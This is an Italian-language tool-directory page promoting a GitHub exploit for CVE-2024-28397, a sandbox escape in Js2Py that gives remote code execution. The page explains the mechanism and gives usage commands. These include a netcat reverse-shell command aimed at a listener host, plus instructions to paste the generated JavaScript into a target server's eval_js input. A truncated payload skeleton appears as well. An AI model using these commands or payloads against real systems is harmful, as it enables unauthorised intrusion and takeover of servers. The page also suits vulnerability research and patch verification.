Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-28397-Js2Py-RCE-Exploit — Exploit professionale per CVE-2024-28397: escape dalla sandbox di Js2Py che porta all'esecuzione remota di codice (RCE). Include generazione modulare di payload. | Kitploit
Strumenti/GitHubGitHub/xeloxa/cve-2024-28397-js2py-rce-exploit
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubxeloxa/cve-2024-28397-js2py-rce-exploit

CVE-2024-28397-Js2Py-RCE-Exploit

Exploit professionale per CVE-2024-28397: escape dalla sandbox di Js2Py che porta all'esecuzione remota di codice (RCE). Include generazione modulare di payload.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi RepositorySito web
2127 mesi faNon ancora revisionato
Condividi

Anteprima del Briefing Tecnico

💡 Approfondimento: Clicca qui per leggere il briefing tecnico completo (PDF).

CVE-2024-28397: Generatore di Payload per Sandbox Escape di Js2Py

Python License CVE

Un generatore di payload professionale per CVE-2024-28397. Questo strumento genera codice JavaScript malevolo progettato per evadere la sandbox js2py (versioni <= 0.74) ed eseguire comandi arbitrari sul sistema target.

🚨 Dettagli sulla Vulnerabilità

  • CVE ID: CVE-2024-28397
  • Componente interessato: <= 0.74
Js2Py
  • Impatto: Esecuzione Remota di Codice (RCE) / Evasione della Sandbox
  • Meccanismo: Sfrutta Object.getOwnPropertyNames per accedere alla classe subprocess.Popen di Python dall'interno dell'ambiente JavaScript.
  • 🚀 Utilizzo

    Questo script genera il payload JavaScript esatto necessario per sfruttare la vulnerabilità. Non è necessario installare js2py per utilizzare questo strumento.

    1. Genera un Payload

    Esegui lo script con il comando che desideri eseguire sulla macchina della vittima.

    root@kitploit:~
    # Generate payload to run 'id'
    python3 exploit.py -c "id"
    
    root@kitploit:~
    # Generate payload for a Reverse Shell
    python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"
    

    2. Attacca il Target

    Copia l'output generato dallo strumento e iniettilo nell'applicazione vulnerabile (ad esempio, un modulo web, un endpoint API o un file di configurazione analizzato da js2py).

    Esempio di Iniezione: Se un sito web prende l'input dell'utente e lo esegue con js2py.eval_js(user_input), incollare il codice generato eseguirà il tuo comando sul loro server.

    📝 Esempio

    root@kitploit:~
    $ python3 exploit.py -c "whoami"
    
        var output = "Initial";
        try {
            var leaked_wrapper = Object.getOwnPropertyNames({});
            // ... (full malicious code) ...
            var res = Popen("whoami", ...).communicate();
            output = res;
        } ...
        output
    

    👨‍💻 Autore

    Ali Sünbül (xeloxa)

    • 📧 Email: [email protected]
    • 🌐 Website: xeloxa.netlify.app
    • 🐙 GitHub: @xeloxa

    ⚠️ Dichiarazione di non responsabilità

    Questo software è fornito esclusivamente per scopi educativi e di ricerca sulla sicurezza. L'autore non si assume alcuna responsabilità per un uso improprio di questo codice. Assicurati di avere l'autorizzazione esplicita prima di testarlo su qualsiasi sistema di cui non sei proprietario.

    Scarica lo strumento